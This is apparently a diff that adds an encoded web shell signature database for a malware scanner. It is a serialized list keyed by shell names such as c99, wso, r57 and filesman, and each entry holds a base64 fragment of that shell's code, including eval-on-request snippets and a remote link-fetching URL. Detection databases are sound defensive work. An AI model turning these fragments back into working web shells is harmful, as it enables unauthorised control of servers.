+WTJobFkydGxjaTVrWlM5b1lYTm9MbU5uYVQ4bk8yUnZZMyI7czoyMDoiZmlsZXNtYW5bMTRdWzBd
+W3BocF0iO3M6NjQ6IjVRVlZRZ2RIbHdaVDF6ZFdKdGFYUWdkbUZzZFdVOUoxSjFiaWMrRFFvOEww
+WlBVazArRFFvTkNqd2xRQ0J3WVciO3M6MTU6ImNtZFsxOF1bMF1banNwXSI7czo2NDoieWNXMUNj
+RmRGZDNWUmJVVXhNMEUzYmxkWlJXSk5TMWRXTlc0MmNqQmxOQ3Q2YUdSNlVqY3JlRUZUZWtKa1RI
+ZCI7czoyMDoicGhwc2hlbGxbMzNdWzBdW3BocF0iO3M6NTk6IlBHRWdhSEpsWmowaWFIUjBjRG92
+TDNkM2R5NXdiMnhwYzJodVpYZHpMbU52YlM5cGJtUmxlQzV3YUhBIjtzOjI0OiJzcGFtX3RydXN0
+YXBwWzBdWzFdW3BocF0iO3M6NjQ6IlpYTWdQVHhKVGtaUFBpQTdDbU5zYjNObEtFbE9SazhwT3dw
+emVYTjBaVzBvUUd4cGJtVnpLVHNLY0hKcGJuUW4iO3M6MjQ6ImFyYWJfYmxhY2tfaGF0WzBdWzBd
+W3BsXSI7czo2NDoiSUR3dmRHRmliR1UrRFFvZ0lDQWdJQ0FnSUEwS0RRb25PeUFOQ2cwS1B6NE5D
+anhpYjJSNUlHSm5ZMjlzYjNJOSI7czoyMDoiaW5kaXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IlBE
+OVFTRkFLSkdacGJHVWdQU0JtYVd4bFgyZGxkRjlqYjI1MFpXNTBjeWdpYUhSMGNEb3ZMMmhoWTJ0
+bGNteGgiO3M6MTk6InNhdmVmaWxlWzBdWzBdW3BocF0iO3M6NjQ6InljM1JoZEhWeklpazdJQTBL
+SUNBa2MzRnNjWFZwWTJ0c1lYVnVZMmhiWFNBOUlHRnljbUY1S0NKVFpYSjJaWEkiO3M6MTk6Imdu
+eXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6ImNHRnVQand2Wm05dWRENDhabTl1ZENCamIyeHZjajBp
+SXpGRU1VUXhSQ0lnWm1GalpUMGlWR0ZvYjIxaElpQnoiO3M6MTk6ImhhY2tlcnBzWzBdWzBdW3Bo
+cF0iO3M6NjQ6Im1kMGFEb2dJaUF1SUhOMGNteGxiaWdrZEdocGN5MCtZWEpqYUdsMlpTa3BPdzBL
+SUNBZ0lDQWdJQ0JvWldGa1oiO3M6MjU6InBocGZpbGVtYW5hZ2VyWzJdWzJdW3BocF0iO3M6NjQ6
+IkhneU1HWmNlREl6WEhneE4xeDRNREZRWEhneE16RmNlREJrTkdaY2VETmxTMXg0TUdNd1dGeDRN
+VFZjZURFeVgiO3M6MjI6Impvb21sYV9zcGFtWzFdWzFdW3BocF0iO3M6NjQ6ImZVa1ZSVlVWVFZG
+c25kWE5sY2lkZEtTay9KRjlTUlZGVlJWTlVXeWQxYzJWeUoxMDZJaUk3RFFwcFppZ2habWwiO3M6
+MTc6ImphY2thbFswXVswXVtwaHBdIjtzOjY0OiIwTGtadmNtMG9JbTF2WkdVaUtTa0taWGhwZENC
+emRXSUtaVzVrSUdsbUNtVnVaQ0JwWmdvS1NIUnRiRWhsWVdSIjtzOjIyOiJlbG1hbGlzZWtlclsw
+XVswXVthc3BdIjtzOjY0OiJiMk5yWlhRc0lDSlFVa2xXVFZOSElDUndjbWx1ZEd3Z09pQk9iV0Z3
+SUZCdmNuUlRZMkZ1SURFeU9pNGdOSHdnIjtzOjE3OiJpcmNfYm90WzBdWzBdW3BsXSI7czo2NDoi
+SUNBZ0lDQWdJQ0JsWTJodklDSThjSEpsUGlJN0NpQWdJQ0FnSUNBZ0pHTnRaQ0E5SUNna1gxSkZV
+VlZGVTFSYiI7czoxNDoiY21kWzRdWzBdW3BocF0iO3M6NjQ6IkJJSzBSWGExRTVNRlpxWVV0RGRW
+bHhhbkJTUWs1alUzVlpNMjVZUkhaYVZEbGlTazl5TUZsaFFtMUhiWFJxUTIiO3M6MTk6InBocHNo
+ZWxsWzJdWzBdW3BocF0iO3M6NjQ6IlpTQnBaRDBpZEdGaWJHVXlJaUJ6ZEhsc1pUMGlZbTl5WkdW
+eUxXTnZiR3hoY0hObE9pQmpiMnhzWVhCelpUc2kiO3M6MTg6InRlYW1zcWxbMF1bMF1bcGhwXSI7
+czo2NDoiQ1IxY213Z0tRMEtDUWw3RFFvSkNRa2tWVkpNY0dOeklEMGdLQ0J3WVhKelpWOTFjbXdv
+SUNSMWNtd2dLU0FwTyI7czoxNToicGJvdFsxXVswXVtwaHBdIjtzOjY0OiJQRDl3YUhBZ2FXWW9h
+WE56WlhRb0pGOVNSVkZWUlZOVVd5SmpiMjF0Wlc1MElsMHBLU0I3SUdWMllXd29ZbUZ6IjtzOjE1
+OiJjbWRbMjNdWzBdW3BocF0iO3M6NjQ6Imw2WlFvZ0lDQWdJQ0FnSUhWcGJuUWdia1JsWm1GMWJI
+UlVhVzFsVDNWMExBa0pDUWtKQ1M4dklIUnBiV1V0YjMiO3M6MjA6Imluc29tbmlhWzBdWzBdW2Fz
+cHhdIjtzOjY0OiJZakk1Y21GWFZXOUpibHB3WXpKc01HTjVTWE5LU0Zwd1l6SnNNRmt5T1RGaWJs
+RndUM2R2ZGt4NVFUTmhSRkoxIjtzOjIzOiJhbnRpc2Vjc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoi
+QklZWFpsYm1GeVpDQXRMVDROQ2p3aExTMGdUVzlrYVdacFpXUWdkRzhnZDI5eWF5QjNhWFJvSURR
+NE5ETndhSCI7czoxNToiY21kWzIxXVswXVtwaHBdIjtzOjY0OiI2WlQwaUlDWWdabWtyTXlBbUlD
+SWdjM1I1YkdVOUlpSmlZV05yWjNKdmRXNWtMV052Ykc5eU9pQnlaMklvTkRnIjtzOjE3OiJhc3B5
+ZHJ2WzBdWzBdW3ZiXSI7czo2NDoiRlNZa295VG5SYVEyUmtVRlF3YVZwdVVuZFlNbHB3WWtkV1pt
+UllRV2xMVTBGblNVaHpaMUZIV2pCalJqbDNaRiI7czoyMDoiOTUxMDc4YmlKWzBdWzBdW3BocF0i
+O3M6NjQ6InRCUWxwNFFVaG1OazVKTVZSMlUyMDJiMFI0U2xvd1EyTTVibFpITlhCcWVHMDFXRGxh
+UkdFeVVVTkZXR0VyVkUiO3M6MjA6InBocHNoZWxsWzE1XVswXVtwaHBdIjtzOjY0OiJDQmpiMnh2
+Y2oxbmNtVmxiajRrWkM4a1pHVnNYMllnUkVWTVJWUkZSQ0U4TDJadmJuUStQQzlpUGcwS1BHSnlQ
+IjtzOjE4OiJuc3R2aWV3WzBdWzBdW3BocF0iO3M6NjQ6Ilcxd0xuTnhiQ0lwT3cwS0lDQWdJQ0Fn
+SUNCb1pXRmtaWElvSWtOdmJuUmxiblF0Vkhsd1pUb2dkR1Y0ZEM5d2IiO3M6MjA6ImZpbGVzbWFu
+WzEyXVswXVtwaHBdIjtzOjY0OiJ0TFMwdExTMHRMUzB0TFMwdExTMHRMUXB6ZFdJZ1JHOTNibXh2
+WVdSR2FXeGxDbnNLQ1NNZ2FXWWdibThnWm1sIjtzOjIwOiJ1bml0eHNoZWxsWzBdWzBdW3BsXSI7
+czo2NDoiWkhZWEpRWm5KbE9YQTVLMmhSVm5WTlZUTjFWbWgyTkdWVU56SnlVa2xMU1hwTkwxTkll
+RVk0ZVRkc1F6bExaVCI7czoxNzoicGhwc3B5WzJdWzBdW3BocF0iO3M6NjQ6IkFnSUR3dmRISStE
+UW9nSUNBZ0lDQWdJRHd2ZEdGaWJHVStEUW9nSUNBZ0lDQWdJRHgwWlhoMFlYSmxZU0J1WVciO3M6
+MjM6ImFudGlzZWNzaGVsbFsyXVswXVtwaHBdIjtzOjU2OiJhSFIwY0Rvdkx6azFMakUyT0M0eE9U
+RXVNVEUyTDBkbGRFeHBibXR6TG1GemFIZy9hRzl6ZEQwPSI7czoxOToiZ2V0bGlua3NbMF1bMV1b
+cGhwXSI7czo2NDoiYVc0Z1hDSmJKVEpkWENJNlhHNWJKVEZkSWl3S0owdHZjSGxoYkdGZlptbHNa
+WE1uSUQwK0lDZERiM0JwYnlCeCI7czoxOToiaW1oYXBmdHBbMF1bMF1bcGhwXSI7czo2NDoiNkwy
+RndjSE5sY25ZdmQzZDNMM05vWld4c2N5OGlQZ29nSUNBZ0lDQWdJRHhtYjI1MElHTnZiRzl5UFNJ
+alJFTiI7czoyMzoic3RyZXNzYnlwYXNzWzBdWzBdW3BocF0iO3M6NjQ6IjBnYzNwRFRVUXNJSE42
+VkdWdGNFWnBiR1VLQ2s5dUlFVnljbTl5SUZKbGMzVnRaU0JPWlhoMENnb25JQzB0SUciO3M6MTQ6
+ImNtZFsxXVswXVthc3BdIjtzOjY0OiI5dGJXRnVaRG9nUEdsdWNIVjBJRzVoYldVZ1BTQW5ZMjFr
+Sno1Y2JpSTdEUW9nSUNBZ0lDQWdJQ0JsWTJodklDIjtzOjIwOiJkYXJrc2hlbGxbMF1bMF1bcGhw
+XSI7czo3OiJ2ZXJzaW9uIjtzOjEwOiIxNDA1Njc0OTQ3IjtzOjY0OiJpY3ZjSFZpYkdsalgyaDBi
+V3d2YVc1akwyTnZibVpwWnk1cGJtTXVjR2h3Snl3a2RYTmxjaTRuTFRNekxuUjRkIjtzOjIwOiJj
+b25maWdzcHlbMV1bMF1bcGhwXSI7czo2NDoiVkRCTlJqaEVhM054Y1ZKalZsQnZUMUZrVW0xaGNX
+YzNlRXh2ZUdNclMxRkxVSEUzTjNwNk9WQmllSGxXWWxkTSI7czoxNToiaXNrb1swXVswXVtwaHBd
+IjtzOjY0OiJ0WlNnZ0pGOUdTVXhGVTFzbmRYQnNiMkZrWldSbWFXeGxKMTFiSjI1aGJXVW5YU2tn
+YjNJZ1pHbGxLQ1JsY25KIjtzOjI1OiJwaHBmaWxlbWFuYWdlcls0XVswXVtwaHBdIjtzOjY0OiJJ
+RzVoYldVOVhDSmZZMjFrWENJZ2RtRnNkV1U5WENJaUxpUmpkWEp5Wlc1MFEwMUVMaUpjSWo0OEwz
+UmtQaUk3IjtzOjE2OiJ3b3JzZVswXVswXVtwaHBdIjtzOjY0OiJmWkhWdGNDazdDbVZzYzJVS2V3
+cHBaaWdoSkhSdlgyWnBiR1VwQ25zS2FHVmhaR1Z5S0NkRGIyNTBaVzUwTFZSIjtzOjE1OiJ6YWNv
+WzBdWzBdW3BocF0iO3M6NjQ6Im5JZ0x6NGlPaWNuS1M0aVBDOTBaRDRpT3cwS0lDQWdmUTBLSUNB
+Z0pITnhiR1J5TGowaVBDOTBjajVjYmlJN0QiO3M6MTY6Im15c3FsWzZdWzJdW3BocF0iO3M6NjQ6
+IlRHUkRlVXNOQ2xWUlJtdG9ZbUkyVHpoa00zUXlMek5xVWxSS0wwbHhVM2REUVVsclJWcEJSVE5p
+TVdKQ2RUWTQiO3M6MjQ6InNlcnZlcl9jb25maWdbMF1bMF1bcGhwXSI7czo2NDoiUnNaVDROQ2lB
+OGMzUjViR1UrRFFvZ0lDQjBaQ0I3RFFvZ0lDQm1iMjUwTFdaaGJXbHNlVG9nZG1WeVpHRnVZUyI7
+czoxODoiY3J5c3RhbFsyXVswXVtwaHBdIjtzOjY0OiJCak9UbHdhSEJwWTNFdWNHaHdJRDhnYUhS
+MGNEb3ZMMk5qZEdWaGJTNXVkV3RzWlc5dUxuVnpEUW9qSXlNakl5IjtzOjE1OiJjOTlbMjldWzBd
+W3BocF0iO3M6NjQ6ImdKeUFnUm1sc1pUb2dJQ0FnUTIxa1FYTndMbUZ6Y0EwS0lDQW5JQ0JCZFhS
+b2IzSTZJQ0JOWVdObGJ5QThiV0YiO3M6MTU6ImNtZFsxNl1bMF1bYXNwXSI7czo2NDoiYVUxTlEy
+RjZheTgxTjBGbGJuVjBiamRXVGxOa2FVRlVTWGxOTDNob2VrNTJZemt5WlRGMVJWZzJVMDkzTkhr
+MCI7czoyNzoiYWhsaXN5dXJnYV9zaGVsbFswXVswXVtwaHBdIjtzOjY0OiI0a2MzUnlLVHNOQ2dr
+SkNRa0pZbkpsWVdzN0RRb0pDUWtKWTJGelpTQW5iWGx6Y1d3bk9nMEtDUWtKQ1FseVpYIjtzOjE0
+OiJ3c29bMF1bMF1bcGhwXSI7czo2NDoiYVV0VFFuWmphVUo2WkVoS2NHTXpVbmxMUTFKNVdsZGFi
+R050Vm5sTVEwb3pXbGRLYUdKSVVtaEphV3RuWWpOSiI7czoyNjoic2hlbGxfdXBsb2FkZXJbMTVd
+WzBdW3BocF0iO3M6MTM1OiI1YjE5ZnhxMzBqRDhkL3dwNUMybkN3M0dnSk9jMURiRWlXTW5UaE03
+OVV1U0pzNU5GMWhnNjRXbHU0dXhtK1B2ZnMrTVhsYmFGOEJwejNYZHorOXhHeHVrMFdqME5ock5q
+RWFsWHVBSElXc3g2NGYrNExHMXMxYnF1d05uNXNlZFdlUjJuRCsiO3M6MTQ6Indzb1s1XVswXVtw
+aHBdIjtzOjY0OiJpOHZWVzUwZFdzZ2IzQjBhVzFoYkdsellYTnBJSFZyZFhKaGJpQmtZVzRnYTJW
+alpYQmhkR0Z1TGdva2FXMW5aIjtzOjE4OiJiYXRhdmk0WzBdWzBdW3BocF0iO3M6NjQ6IkFnSUNB
+Z0lDQWdJQ0FnSUNCOUNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdSMWNESW9hVzV6
+YjIiO3M6MTk6ImJsaW5kc2hlbGxbMF1bMF1bY10iO3M6NjQ6ImJXVWdMbWgwY0dGemMzZGtJajRO
+Q2drSlptbHVaQ0JoYkd3Z0xtaDBjR0Z6YzNka0lHWnBiR1Z6UEM5dmNIUnAiO3M6MTg6ImNyeXN0
+YWxbMV1bMF1bcGhwXSI7czo2NDoiRVJSYjBwRFVXdEtRMVJXYW1GRVNXZGhTRkowWWtoT2QwNVhU
+VEJOVjNocVlVUkdlV041YUVGYWJra3hUVmRSYiI7czoxODoicjNsYXBzM1swXVswXVtwaHBdIjtz
+OjY0OiJJQ0FnSUNBZ0lDQWdJQ0FnSkhaMklEMGdabUZzYzJVN0NpQWdJQ0FnSUNBZ0lDQWdJQ0Fn
+SUNBZ0lDQWdJQ0FnIjtzOjE5OiJ3M2RzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJsWUt5OXRjVVE0
+YjJGVmFsaHdiekJOVGswM1pWVXJNalk0UnpkV09GcDBVa1J1YUZweFNEUkNOR1ZMVTNRMFpGIjtz
+OjE2OiJiMzc0a1s2XVswXVtwaHBdIjtzOjY0OiJWd3BsWVdnMFF6VkxkVWR0YUUweGJWZzBiSGhL
+VWtvM1JERlNkM296VmxsdVJGQklZazVzV1hJNVZ5dHhRblpXIjtzOjE2OiJiMzc0a1s0XVswXVtw
+aHBdIjtzOjY0OiJkQ0k3THk5bWIzSnRZWFJ2RFFva1NHRjRjR3h2Y21WeVgyRmtaSEk5SkhKbGJX
+OTBaVjloWkdSeUxpSjBiMjlzIjtzOjI0OiJhbGJhbmlhbnNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6
+InNnWlhocGREc2dmU0JsYkhObElIc05DZ2tKSm5SNWNHVW9KR05vWVc0c0pHSjFaeXdrWkc5eWF5
+d2lSR1ZOYjMiO3M6MTk6Imhvc3RkZXZpbFswXVswXVtwbF0iO3M6NjQ6ImhiSE5sS1NCN0RRb0pD
+UWtKYVdZZ0tDUm1JQ0U5SUNjdUp5QW1KaUFrWmlBaFBTQW5MaTRuSUNZbUlDRmtaV3ciO3M6MjI6
+IjQyMDUzMnNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IjFwY1hRcmVFUm1Tek5CVFRkeVlXMTVRa1pT
+VFVWNllrOUtVakJDVnpKbmRqaHRia3g1Ymtod0szQm5VV05LYzAiO3M6MjQ6InNlcnZlcl9jb25m
+aWdbMV1bMF1bcGhwXSI7czo2NDoiWVdsc09qd3ZabTl1ZEQ0OEwyUnBkajQ4TDNSa1BnMEtDUWtK
+UEhSa0lIZHBaSFJvUFNJeE9DVWlQanhtYjI1MCI7czoyMToicGhwX21haWxlclswXVsxXVtwaHBd
+IjtzOjY0OiJKNUlIUnl4ckRodTV0aklHdG9hU0JpNGJxdmRDREVrZUc2cDNVZ1orRzdyV2tnZEds
+dUlHNW80YnF2YmlCcjRiIjtzOjI2OiJzaGVsbF91cGxvYWRlclsxMV1bMF1bcGhwXSI7czo2NDoi
+YlhCc1pYUmxJR0ZtZEdWeU9pQjdKR1Y0WldOZmRHbHRaWDBnYzJWamIyNWtjMXh1SWpzTkNnMEtm
+UTBLRFFwbCI7czoyMToidWRwZmxvb2RlclswXVswXVtwaHBdIjtzOjY0OiIxSzBScU9FTTNialZH
+TkZaYVZqVlpWR3hoY21wRGVXeGFSVGRsY2pFelJIUktabEV4Y21sVlVuSmtiV1JZZUdwIjtzOjIw
+OiJlZ3lzcGlkZXJbMF1bMF1bcGhwXSI7czo2NDoiV1VpT3cwS0NRa0pmUTBLQ1FrSmFXWW9JV2x6
+WDJGeWNtRjVLQ1JwYm1SbGVGc2thMjVoYldWZEtTa2dldzBLQyI7czoyMjoiNjI5Nzg4dHJ5YWdb
+MF1bMF1bcGhwXSI7czo2NDoiQWRBRDkvMVVBUUFBakFFQUFKZ0JwQUZjQVhnQTZBRU1BVGdCeUFH
+TUFjZ0JJQUdvQS9mODdBQ0FBV1FCTEFGYyI7czoxNjoiZWZzbzJbMV1bMF1bYXNwXSI7czo2NDoi
+bFBWd2lkR1Y0ZEZ3aUlHNWhiV1U5WENKaFkzUmhjbU5pZFdabVgzQmhkR2hjSWlCMllXeDFaVDFj
+SW5sNFgyRiI7czoxNToiYzk5WzIxXVswXVtwaHBdIjtzOjY0OiJnSUNBZ0lDQWdJQ0FnSUNJZ0lD
+QWdJQ0FnSUNBZ0lDQWdabUYwWVd3b1hDSlZibUZpYkdVZ2RHOGdZMmhoYm1kIjtzOjIwOiJwaGFu
+dGFzbWFbMF1bMF1bcGhwXSI7czo2NDoiblp1TkdaaGVHVlpXVkIwTlcxV1RUQm9ZV3hOYmpGd1Ft
+YzJReTlPU0ZKV1lqWXhaRkZJTkhsUlRuQnNTRm8wZCI7czoxNzoiYjM3NGtbMTJdWzBdW3BocF0i
+O3M6NjQ6IlNJcE93MEtEUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdVM1J5WldGdFEyOXVibVZqZEc5
+eUlHOTFkSEIxZEVOdmIiO3M6MjE6ImpzcHJldmVyc2VbMF1bMF1banNwXSI7czo2NDoiZlFwbGJI
+TmxhV1lnS0Nna2JXOWtaU0FtSURCNE5qQXdNQ2tnUFQwOUlEQjROakF3TUNrZ2V5UjBJRDBnSW1J
+aSI7czoxNToiYzk5WzE5XVswXVtwaHBdIjtzOjY0OiJaWFpoYkNnaWFXWW9hWE56WlhRb1hDUmZV
+a1ZSVlVWVFZGc25ZMmduWFNrZ0ppWWdLRzFrTlNoY0pGOVNSVkZWIjtzOjE0OiJjbWRbMF1bMF1b
+cGhwXSI7czo2NDoiK0NqeGljajRLUEdsdWNIVjBJSFI1Y0dVOVZFVllWQ0J1WVcxbFBTSXRZMjFr
+SWlCemFYcGxQVFkwSUhaaGJIViI7czoxNDoiY21kWzNdWzBdW3BocF0iO3M6NjQ6ImdJQ0FnSUds
+bUlDaDFibXhwYm1zb0pHWnBiR1VwS1hzTkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhV1ki
+O3M6MjU6InBocGZpbGVtYW5hZ2VyWzFdWzJdW3BocF0iO3M6NjQ6InBhMkV1ZDNKcGRHVWdJa052
+Ym5OMElHRmtVMkYyWlVOeVpXRjBaVTkyWlhKWGNtbDBaU0E5SURJaUlDWWdkbUoiO3M6MTU6ImFq
+YW5bMF1bMF1bYXNwXSI7czo2NDoiSUM0aUlFZENJanNnZlEwS0lDQWdJR1ZzYzJWcFppQW9JQ1J6
+YVhwbElENDlJREV3TkRnMU56WWdLU0I3SUNSeiI7czoxOToiaXBheXM3NzdbMV1bMF1bcGhwXSI7
+czo2NDoieGlZWEl0WkdGeWEzTm9ZV1J2ZHkxamIyeHZjam9nYzJsc2RtVnlPd29nSUNBZ0lDQWdJ
+Q0FnSUNCelkzSnZiRyI7czoxOToic2FmZW1vZGVbMV1bMF1bcGhwXSI7czo2NDoiSUNNZ0lDQWdJ
+eU1OQ2k4cUlDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZyI7
+czoxNToicjU3WzIwXVswXVtwaHBdIjtzOjY0OiJVMjEzVnpSS2JGTkZUMGxrWWpoR2EwbFRLMU14
+VFZWMVUxZHRjVGx4VkdvMk1VSnNPSFJUWkZrd01XNHpZM3A2IjtzOjI1OiJzaGVsbF91cGxvYWRl
+clsxXVswXVtwaHBdIjtzOjY0OiJ5YzlQaWNtSXpFd05UYzdKaU14TURnMk95WWpNVEEzT1RzbUl6
+RXdOelk3SmlNeE1EY3lPeVlqTVRBNU1Ec21JIjtzOjE1OiJyNTdbMTddWzBdW3BocF0iO3M6NjQ6
+Im9nSUNBZ2ZRMEtJQ0FnZlEwS0lDQjlEUW9nSUNSb1pXRmtXeVJyWFNBOUlDSThZajRpTGlSb1pX
+RmtXeVJyWFMiO3M6MTQ6ImM5OVs5XVswXVtwaHBdIjtzOjY0OiJTSXBPeUJsZUdsME95QjlDZ292
+TDAxaGFHdGxiV1VnUld0c1pXNTBhWE5wYm1VZ1dXRnJZV3hoYmlZak16QTFPIjtzOjE4OiJtYWhr
+ZW1lWzBdWzBdW3BocF0iO3M6NjQ6InZibWMrQ2p4aVBqeDFQanhqWlc1MFpYSStQRDl3YUhBZ1pX
+Tm9ieUFpVkdocGN5QnpaWEoyWlhJZ2FHRnpJR0oiO3M6MjA6InJvb3RzaGVsbFszXVswXVtwaHBd
+IjtzOjY0OiJGaVl6VTFZamdpT3lBamNtOXZkQTBLSkdOdmJHOXlJRDBnSWlOa1pqVWlPdzBLSkdS
+bFptRjFiSFJmWVdOMGFXIjtzOjIwOiJmaWxlc21hblsxMF1bMF1bcGhwXSI7czo2NDoiaGJEMGta
+R2x5WDJGMGRXRnNKeXRoY21jckp5OG5PdzBLZlEwS1puVnVZM1JwYjI0Z2MyaHZkMTl1WVcxbGN5
+ZyI7czoyNToicGhwZmlsZW1hbmFnZXJbMF1bMl1bcGhwXSI7czo2NDoiV0V4RGFGVlhaak5KVGpS
+UmMxRlRSVkk0YkN0MVdVZFFabkZxUTJkNVZqRldNRlIwWTFwUWRESlZNbmRHYVVsaiI7czoyMToi
+Y2xlYXJzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJ3WVhOemQyUThMMjl3ZEdsdmJqNE5Danh2Y0hS
+cGIyNGdkbUZzZFdVOUltNWxkSE4wWVhRZ0xXRnVJSHdnWjNKIjtzOjE4OiJsaXpvemltWzFdWzBd
+W3BocF0iO3M6NjQ6InBPdzBLSUgwTkNpQnBaaWdrWDFCUFUxUmJKM0JoYzNNblhTQTlQU0FrY0dG
+emMzZHZjbVFwRFFvZ2V3MEtJQ0EiO3M6MjA6Imlyb25zaGVsbFsyXVswXVtwaHBdIjtzOjY0OiJZ
+eloxa3JWblJSUTJGSlJWQmhjbHBsZGpkSk9USldRVE5uUzFaMlpWRXdOamhyTTI1Q2RtTm5TREF5
+VEc5SlptIjtzOjIwOiJhbC1tYXJodW1bMF1bMF1bcGhwXSI7czo2NDoiSmtaWEk5TVQ0S0NqeDBj
+aUJpWjJOdmJHOXlQV2R5WldWdVBqeDBaRDVrTUcxaGFXNXpQQzkwWkQ0OGRHUStkWCI7czoyMDoi
+Y29uZmlnc3B5WzNdWzBdW3BocF0iO3M6NjQ6IkJvY0dKaUoxMHBLU0FLZXlBS1pXTm9ieUFpUEdO
+bGJuUmxjajQ4ZEdGaWJHVWdZbTl5WkdWeVBUQWdkMmxrZEciO3M6MTg6ImxvbGlwb3BbMF1bMF1b
+cGhwXSI7czo2NDoiVlVWVFZGc25aR2x5SjEwN0Nna0pKR1p1WVcxbFBTUklWRlJRWDFCUFUxUmZS
+a2xNUlZOYkoyWnBiR1ZmYm1GdCI7czoyMjoicGhwYmFja2Rvb3JbMF1bMF1bcGhwXSI7czo2NDoi
+SnlPREY0VXk5eFNFUmxlbk5KTDI0d09TOVFjRFpsWlZnNFdpOUxkbFE1U2lzdlpWcHlLMGQxWVRo
+d2RrZHRaViI7czoyMjoiZGV2aWx6c2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiYldWdWRDNWpjbVZo
+ZEdWRmJHVnRaVzUwS0NKd2NtVWlLVHNOQ2w5aExuTjBlV3hsTG1ScGMzQnNZWGs5SW1sdSI7czoy
+OToiYWpheF9jb21tYW5kX3NoZWxsWzFdWzBdW3BocF0iO3M6NjQ6ImNHVTlkR1Y0ZENJdVFDUmZV
+RTlUVkZzblptbHNaU2RkTGlJK1BHSnlQaUk3Q21WamFHOGdJanhwYm5CMWRDQjAiO3M6MTc6Im5z
+aGVsbFswXVswXVtwaHBdIjtzOjY0OiJHVmhaR1Z5SUM0OUlDSWtiV1Z6YzJGblpWeHlYRzRpT3cw
+S0lDQWdJQ0FnU1dZZ0tDUm1hV3hsWDI1aGJXVXBJIjtzOjE1OiJzcGFtWzJdWzBdW3BocF0iO3M6
+NjQ6Ik1qRWdYRzRpT3lBS2ZTQUtkWE5sSUZOdlkydGxkRHNnQ25WelpTQkdhV3hsU0dGdVpHeGxP
+eUFLYzI5amEyVjAiO3M6MjI6ImNvbm5lY3RiYWNrMlswXVswXVtwbF0iO3M6NjQ6InBPbmc2TDJj
+cGV3b21iR2xzS0NReEtUc0tjSEpwYm5RZ1RWbEdTVXhGSUNReExpSXVkSGgwSUNJN0NtWnZjaWci
+O3M6MTc6Imtpbmc1MTFbMF1bMF1bcGxdIjtzOjY0OiJDZ2tKSUdsbUlDaHpkSEl1YVc1a1pYaFBa
+aWhrYjNRc0tHeGhkQ3N5S1NrOVBTMHhLWHNLQ2drSklDQWdJR0ZzIjtzOjM2OiJjcmlzdGVyY29y
+cF9pbmZvY29sbGVjdG9yWzFdWzBdW3BocF0iO3M6NjQ6IlhoMFBTSWpOMkUzWXpka0lqNE5DaUFn
+SUNBZ0lDQThaR2wySUdGc2FXZHVQU0pqWlc1MFpYSWlQZzBLSUNBZ0kiO3M6MTg6InRlYW1zcWxb
+MV1bMF1bcGhwXSI7czo2NDoiQ0FnSUNBZ0lDQmpiMjUwWVdsdWFXNW5JR0VnWUM0bklHWnZiR3h2
+ZDJWa0lHSjVJRzkwYUdWeUlIUmxlSFFnYSI7czoxNToic210cGRbMF1bMV1bcHldIjtzOjY0OiJN
+R1I2WVU4MWRFaGpNbXAxWWxJelRtODNiVEJrZW1FS1R6VjBTR015YW5WaVVqTk9iemR0TUdSNllV
+ODFkRWhqIjtzOjE5OiJkYzNzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJna1gxQlBVMVJiSjJOdmJX
+MWhibVFuWFNrN0RRcGxZMmh2SUNJOEwzUmxlSFJoY21WaFBpSTdEUXBsZUdsME93IjtzOjE5OiJk
+YzNzaGVsbFsxXVswXVtwaHBdIjtzOjY0OiIyVXVZMjl0Q2dvZ0lFTnZjSGx5YVdkb2RDQW9ZeWtn
+TWpBd015QnZjME52YlcxbGNtTmxDZ29nSUZKbGJHVmhjIjtzOjE1OiJjbWRbMzRdWzBdW3BocF0i
+O3M6MTM4OiJrMXBlR3d5UVVwaVRXUmxVMDVMZGt3MVFXOWhiemczVDNwemVuVXhkRFkwV2xSR09X
+VktkVFJKTlZWQ04wbHBNRzlwSzBFME1VMVBUMEZKTjNreFRWWlZRbFkzV0dkSVRrWjNkVGRwYnpr
+NGNXZElNME5CTm5SbGMxSTJUWFZKU0hJMGNTOVNNVkUiO3M6MTY6InB6YWR2WzBdWzFdW3BocF0i
+O3M6NjQ6IkY0TkUxcVJrOVlTR2Q2V1ZaNE5FMUhVbU5sUkVVeFdFaG5kMWxzZURSTlYxWmpaVVJC
+TWs1RVdtTmxSRWwzV0UiO3M6MjI6Impvb21sYV9zcGFtWzJdWzFdW3BocF0iO3M6NjQ6ImFXNGdZ
+Mjl1Wm1sbkxpb2dabWxzWlhNdUxpNWNibHh1SWpzZ0RRcG1iM0psWVdOb0lDZ2tkWE5sY25NZ1lY
+TWciO3M6MTQ6Ik8wT1swXVswXVtwaHBdIjtzOjY0OiJtVjNJRk5vWld4c0lFSjVJQzR2VFVONVlt
+VnlUR2x1YTE5UWIzSjBNaklwSUNvdklBMEtKR0YxZEdoZmNHRnpjIjtzOjIwOiJwaHBzaGVsbFsz
+NV1bMF1bcGhwXSI7czo2NDoiQ2drWkdseUxpSXZJaTRrWkdsemJXa3lMQ1JtYVd4bGNHVnliU2tn
+UHlBaVBHWnZiblFnWTI5c2IzSTlKeU13TSI7czoxNzoiYVpSYWlMWzBdWzBdW3BocF0iO3M6NjQ6
+IldDMXZJRFl0YnlCWUxXOGdUeTF2SUV3dGJ5QmxMVzhnZUMxdklGSXRieUEwTFc4Z0t5MXZJRFl0
+YnlCVUxXOGciO3M6MTU6ImM5OVsxNl1bMF1bcGhwXSI7czo2NDoiM1IzWnphbWhXYjBOWGRWVXph
+bU5tTlhoSVNXVldSMlpoTkRsYVZURlVVbFJOTXpWdVZXeEVhV1oxZUVaalNqUiI7czoyMDoic3R1
+bnNoZWxsWzJdWzBdW3BocF0iO3M6NjQ6IktJQ0FrUkVORGV5UmtZMk56YjJOcmZYdGllWFJsYzMw
